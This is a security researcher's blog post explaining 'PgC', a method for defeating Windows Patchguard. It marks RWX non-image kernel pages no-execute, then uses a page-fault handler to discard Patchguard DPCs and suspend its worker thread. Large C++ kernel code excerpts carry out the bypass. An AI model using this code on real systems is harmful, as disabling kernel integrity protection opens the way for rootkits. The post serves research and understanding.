PgC: Garbage collecting Patchguard away

Almost 5 years ago I released another article about Patchguard, ByePg, which was about exception hooking in the kernel. Let’s be frank though, it didn’t entirely get rid of Patchguard. In this article I will be discussing an entirely different approach to bypassing it: PgC.

There is already plenty of great research on Patchguard; Tetrane even released a 61-page whitepaper on all of its intricacies. What makes PgC different is that it does not actually depend on how Patchguard works, only on the very obvious principles of memory management. The advantage of this approach is that it does not defeat a specific version of Patchguard, but rather the entire concept of it. I’ll admit I have been sitting on this for a while, almost 7 years, during which I only had to change a single line of code to keep it up to date (Hi KiSwInterruptDispatch 👋), but I think it is now time to share it with the world.

¶ 0x0: A stark contrast

There is only one thing we need to know about Patchguard in order to come up with an idea to defeat it: it runs on non-image pages and it decrypts itself on the fly.

Just by knowing this you should see where this is going when you recall that the Windows kernel, like any other modern operating system, absolutely hates the idea of RWX memory in Ring 0! It is a security nightmare after all, and Microsoft will not sign your driver if you have RWX sections in it. A case of do as I say, not as I do, interesting!

¶ 0x1: System VA types

Before we start engineering a solution to attack this very contrast, there is one more thing we should know about our beloved OS: how it likes to keep its memory arranged. Let’s play a little game. Go ahead and launch Process Hacker, or any other tool that shows you the image base of a kernel driver and pick a (non-session) driver and check its image base. Does it start with something close to 0xfffff803?

Admittedly, this was not the best party trick, but the point of it all is that the kernel manages each “type” of memory in different PXIs (PML4/PML5 indices). You can get an idea of how this all works by looking at the enum _MI_SYSTEM_VA_TYPE. Within MiVisibleState there is a neat little array called SystemVaType, mapping each of the upper 256 PXIs to a specific type of memory. This means that when you allocate a page, it isn’t really random where it ends up, even if the layout is somewhat randomized on each boot.
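To make the party trick concrete, here is a minimal sketch of how a PXI falls out of a virtual address. It assumes 4-level paging (48-bit virtual addresses); the helper names and the sample address are made up for illustration and are not part of the kernel or of PgC.

```cpp
#include <cassert>
#include <cstdint>

// Assumption: 4-level paging, 9 index bits per level above a 12-bit page offset.
constexpr unsigned page_shift = 12;
constexpr unsigned bits_per_level = 9;

// Hypothetical helper: index of `va` in the table at `level`
// (0 = PT, 1 = PD, 2 = PDPT, 3 = PML4).
constexpr uint64_t table_index( uint64_t va, unsigned level ) {
	return ( va >> ( page_shift + bits_per_level * level ) ) & 0x1ff;
}

// Hypothetical helper: the top-level index (PXI) of an address.
constexpr uint64_t pxi_of( uint64_t va ) { return table_index( va, 3 ); }

// The kernel half of the address space is PXIs 256..511.
constexpr bool is_kernel_pxi( uint64_t pxi ) { return pxi >= 256 && pxi < 512; }

// An image base beginning with 0xfffff803 lands in PXI 0x1f0.
static_assert( pxi_of( 0xfffff80300000000ull ) == 0x1f0, "unexpected PXI" );
```

Given a copy of the SystemVaType array, the type of an address would then be the entry at `pxi_of( va ) - 256`.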

To give you an idea of each region of memory, here’s a snippet of the enum:

namespace mi
{
    // [enum _MI_SYSTEM_VA_TYPE]
    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
    //
    enum class system_va_type_t : int32_t
    {
        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        formerly_session_global_space = 0xb,      // Windows 11
        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_non_paged =        0xd,      // Windows 10 v1607
        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //maximum_type =                0xe,      // Windows 10 v1607
        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //system_ptes_large =           0xf,      // Windows 10 v1607
        kernel_shadow_stacks =          0x10,     // Windows 11
        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
        kasan =                         0x11,     // Windows 11
        //maximum_type =                0x12,     // Windows 11
    };
};

What this means is that, if we exclude the pages that are used for actual kernel images and filter for RWX memory, what we end up with is a very small subset of allocations, most likely either Patchguard or some rootkit you sadly have on your system.
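The RWX filter itself comes down to three bits of an x64 page table entry. Below is a small sketch using the architectural bit positions (present = bit 0, writable = bit 1, execute-disable = bit 63). The constant and function names are assumptions for illustration, and like the check in this article it only inspects the leaf entry rather than the permissions accumulated over every level.

```cpp
#include <cassert>
#include <cstdint>

// Architectural bits of an x64 page table entry.
constexpr uint64_t pte_present = 1ull << 0;
constexpr uint64_t pte_write = 1ull << 1;
constexpr uint64_t pte_nx = 1ull << 63;

// Hypothetical predicate: true if the leaf entry maps present,
// writable and executable memory.
constexpr bool is_rwx( uint64_t pte ) {
	return ( pte & pte_present ) && ( pte & pte_write ) && !( pte & pte_nx );
}

// Hypothetical helper: the same entry with execution disabled.
constexpr uint64_t with_nx( uint64_t pte ) { return pte | pte_nx; }
```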

¶ 0x2: GC

Big corporations might not like the fact that you really have the same privileges as their OS on your own machine, but (for the next few years at least) you do. So let’s just do a little garbage collection of our own and mark these pages no-execute.

scheduler::call_ipi( [ & ] ( auto barrier ) {
	barrier->up();

	// Determine the range we scan.
	//
	auto [range_min, range_max] = get_range( range_per_cpu );

	// Iterate all top level page table entries in kernel address space.
	//
	for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
		// If ignored region, skip.
		//
		if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
			continue;

		auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
		{
			auto pte = mem::get_pte( va, N );

			// Skip if not present.
			//
			if ( !pte->present )
				return;

			// If we did not reach the bottom level:
			//
			if constexpr ( N != 0 ) {
				// If directory:
				//
				if ( !pte->large_page ) {
					// Iterate all pt entries:
					//
					for ( size_t ipte = imin; ipte != imax; ipte++ )
						self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
					return;
				}
				// If large page, skip if too large to be considered.
				//
				else if constexpr ( N > 1 ) {
					return;
				}
				// Fallthrough to page handling.
			}

			// Skip if not RWX.
			//
			if ( !pte->write || pte->execute_disable )
				return;

			// Skip if user-mode memory mapped to kernel.
			//
			if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
				return;

			// Disable execution.
			//
			atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
		};
		rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
	}

	// Flush the TLB and return.
	//
	barrier->down();
	ia32::flush_tlb();
} );

This code more or less comes down to:

Launch an IPI since we don’t want to race with the rest of the OS.
Iterate all the kernel pages (indices 0x100 to 0x1ff).
Skip the ones that could not contain Patchguard. I’d recommend skipping SessionSpace, ProcessSpace, DriverImages, PagedPool and, most importantly, the self-referencing index, unless you want to triple fault.
Skip the pages that are no-execute, write disabled or not present.
Go ahead and flip the NX bit.
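The address arithmetic in the walk above is easier to follow in isolation. The sketch below assumes 4-level paging; `make_canonical` and `child_va` are stand-ins written for this example and only mirror what the listing does with `mem::make_cannonical` and the `va | ( ipte << ... )` expression, they are not the actual library helpers.

```cpp
#include <cassert>
#include <cstdint>

// Assumption: 4-level paging, so 48 bits of virtual address.
constexpr unsigned va_bits = 48;
constexpr uint64_t va_mask = ( 1ull << va_bits ) - 1;
constexpr uint64_t sign_bit = 1ull << ( va_bits - 1 );

// Sign-extend bit 47 into bits 48..63 so the CPU accepts the address.
constexpr uint64_t make_canonical( uint64_t va ) {
	return ( va & sign_bit ) ? ( va | ~va_mask ) : ( va & va_mask );
}

// First address covered by entry `index` of the table at `level`
// (0 = PTE, 1 = PDE, 2 = PDPTE, 3 = PML4E) below `base`.
constexpr uint64_t child_va( uint64_t base, unsigned level, uint64_t index ) {
	return base | ( index << ( 12 + 9 * level ) );
}

// Base address of a top-level index, as used to seed the recursion.
constexpr uint64_t pxi_base( uint64_t ipxe ) {
	return make_canonical( ipxe << ( va_bits - 9 ) );
}
```

With these, index 256 maps to 0xffff800000000000 and index 511 to 0xffffff8000000000, which is exactly the kernel half the loop iterates over.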

If this all goes right, you will bluescreen in two to three minutes, which is when Patchguard would have decrypted itself and tried to run: ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY. Hurray?

¶ 0x3: Healing back our OS

We now need a hook on #PF. Remember, there is no Patchguard anymore, so our job is very straightforward. You can switch the IDT and add your own page fault handler, inline hook MmAccessFault, or use whichever method you’d like, as long as you do it quickly and right before our IPI.
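Whichever hook you pick, the handler first has to decide whether a fault is one of ours. Here is a sketch of that decision based on the architectural #PF error code bits (P = bit 0, W/R = bit 1, U/S = bit 2, I/D = bit 4). The function name is an assumption, and a real handler would additionally look at the faulting address in CR2, since a SMEP violation produces the same bit pattern.

```cpp
#include <cassert>
#include <cstdint>

// Architectural bits of the x64 page fault error code.
constexpr uint32_t pf_present = 1u << 0;           // fault on a present page
constexpr uint32_t pf_write = 1u << 1;             // caused by a write
constexpr uint32_t pf_user = 1u << 2;              // raised in user mode
constexpr uint32_t pf_instruction_fetch = 1u << 4; // caused by an instruction fetch

// Hypothetical predicate: an instruction fetch from a present page
// while running in kernel mode, i.e. a candidate kernel NX fault.
constexpr bool is_kernel_nx_fault( uint32_t error_code ) {
	return ( error_code & pf_present ) &&
	       ( error_code & pf_instruction_fetch ) &&
	       !( error_code & pf_user );
}
```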

The final step, even with zero prior knowledge of how Patchguard works, is surprisingly simple. Just let it bluescreen a few times and look at the dump! You will notice that there are a few DPCs, all of which start with an XOR instruction, and a worker at PASSIVE_LEVEL. The worker we will suspend forever, and for the DPCs, we’ll just return to whoever is calling without doing anything.
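Returning to the caller works because the NX fault fires on the very first instruction fetch of the routine, so the stack pointer in the trap frame still points at the return address pushed by the caller. A user-mode sketch of that emulated `ret`, using a trimmed-down, hypothetical trap frame rather than the real structure:

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical, minimal trap frame; the real one carries many more fields.
struct trapframe {
	uint64_t rip;
	uint64_t rsp;
};

// Emulate a `ret`: pop the return address off the stack into rip.
// Only valid while rsp still points at the caller's return address,
// i.e. before the faulting routine has executed a single instruction.
inline void emulate_ret( trapframe& tf ) {
	tf.rip = *reinterpret_cast<const uint64_t*>( tf.rsp );
	tf.rsp += 8;
}
```

After the handler returns, execution resumes in the caller as if the DPC routine had returned immediately.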

That was pretty much it. The entire source code comes down to essentially 200 lines and there is no more Patchguard.

static constexpr bool pgc_debug = is_debug_build() && true;
static constexpr bool pgc_disable_timer_dispatch = true;
static constexpr bool pgc_disable_dpc_dispatch =   true;
static constexpr bool pgc_disable_context_dpc =    true;
static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }

// The ISR handling Kernel-mode NX faults:
bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
	// If ignored region, skip.
	//
	if ( is_va_ignored( virtual_address ) )
		return false;

	// Get IRQL, display details.
	//
	auto* stack = ( void** ) ( tf->rsp & ~7ull );
	irql_t irql = ia32::get_effective_irql( tf->rflags );
	if constexpr ( pgc_debug ) {
		log( "KNX Caught @ %p\n", tf->rip );
		log( "RSP:  %p\n", tf->rsp );
		log( "RAX:  %p\n", tf->rax );
		log( "RCX:  %p\n", tf->rcx );
		log( "RDX:  %p\n", tf->rdx );
		log( "RBX:  %p\n", tf->rbx );
		log( "RBP:  %p\n", tf->rbp );
		log( "R8:   %p\n", tf->r8 );
		log( "R9:   %p\n", tf->r9 );
		log( "R10:  %p\n", tf->r10 );
		log( "R11:  %p\n", tf->r11 );
		log( "IRQL: %d\n", irql );
		for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
			if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
				break;
			}
			auto ins = xed::decode64( ( void* ) p );
			if ( !ins ) break;
			log( "%p: %s\n", p, ins->to_string() );
			p += ins->length();
		}
	}

	// Dispatch level or IPI level PatchGuard components:
	//
	if ( irql >= DISPATCH_LEVEL ) {
		uint8_t* bytes = ( uint8_t* ) tf->rip;

		// KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
		//
		if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( tf->rcx == tf->rip ) {
					if constexpr ( pgc_debug )
						log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		}
		else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
					if constexpr ( pgc_debug )
						log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		}

		// KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
		//
		if constexpr ( pgc_disable_timer_dispatch ) {
			for ( int i = 0; i < 0x20; i++ ) {
				// pushfq
				if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
					for ( int j = i; j < 0x20; j++ ) {
						// sub rsp
						if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
							if constexpr ( pgc_debug )
								log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
							tf->rip = *( uint64_t* ) tf->rsp;
							tf->rsp += 8;
							return true;
						}
					}
				}
			}
		}
	} else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
		// Deferred work item?
		//
		uint64_t last_valid_vpn = 0;
		for ( int i = 0; i < 0x20; i++ ) {
			// Validate stack pointer.
			//
			auto* value_ptr = &stack[ i ];
			if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
				if ( !mem::is_address_valid( value_ptr ) ) {
					break;
				}
				last_valid_vpn = vpn;
			}

			// Check if it matches the value we expected.
			//
			void* value = *value_ptr;
			if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
				continue;
			}

			// Align stack
			tf->rsp &= ~0xF;
			// Set the arguments in registers, the interval itself lives on the stack
			tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
			tf->rdx = false;
			*( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
			// Simulate call [KeDelayExecutionThread]
			tf->rsp -= 8;
			*( uint64_t* ) tf->rsp = tf->rip;
			tf->rip = ( uint64_t ) &ke::delay_execution_thread;

			// Lower IRQL and return.
			//
			if constexpr ( pgc_debug )
				log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
			ia32::set_irql( APC_LEVEL );
			tf->rflags.interrupt_enable_flag = true;
			return true;
		}
	}

	// False positive, fix NX and continue.
	//
	auto [pte, _] = mem::lookup_pte( virtual_address );
	atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
	return true;
}

// Initializes the patchguard bypass.
//
void init() {
	// Fetch the number of processors and distribute the work.
	//
	static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
	static const uint16_t range_per_cpu = 512 / num_processors;
	static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
		// [ idx*R, (idx+1)*R )
		uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
		uint16_t rmax = rmin + range_per_cpu;

		// If last range, round to max.
		if ( ( rmax + range_per_cpu ) >= 512 )
			rmax = 512;

		return { rmin, rmax };
	};

	// Add the patches and call the IPI.
	//
	if ( sdk::exists( ki::sw_interrupt_dispatch ) )
		hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
	if ( sdk::exists( ki::mca_deferred_recovery_service ) )
		hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
	scheduler::call_ipi( [ & ] ( auto barrier ) {
		// .... See above
	} );
}
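The odd-looking interval written to the stack in the worker path, -0x11F0231A4F3000, is less magical than it looks. KeDelayExecutionThread takes its interval in 100-nanosecond units, with a negative value meaning relative to now, so “suspend forever” here is roughly 16 years. A small sketch of the conversion; the helper names are made up for this example.

```cpp
#include <cassert>
#include <cstdint>

// The interval used in the listing above.
constexpr int64_t pgc_delay = -0x11F0231A4F3000;

// Kernel wait intervals are expressed in 100ns units.
constexpr int64_t ticks_per_second = 10'000'000;

// Negative intervals are relative to the current time.
constexpr bool is_relative( int64_t interval ) { return interval < 0; }

// Hypothetical helper: length of the wait in whole seconds.
constexpr int64_t delay_seconds( int64_t interval ) {
	return ( interval < 0 ? -interval : interval ) / ticks_per_second;
}

// Hypothetical helper: length of the wait in whole days.
constexpr int64_t delay_days( int64_t interval ) {
	return delay_seconds( interval ) / 86'400;
}
```

For `pgc_delay` this works out to 504910816 seconds, or 5843 whole days.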

As it stands right now, the code base is not yet ready for release due to the vast number of dependencies on bits and pieces of my libraries (C runtime, the hooking library, ISRs…), but I will try to release a standalone version of PgC in the near future. You can find some of the memory utilities used above on GitHub.

I hope you enjoyed this article and the trick even more. If you have any questions, feel free to ask them on the bird app or the comments below.


Can Bölük
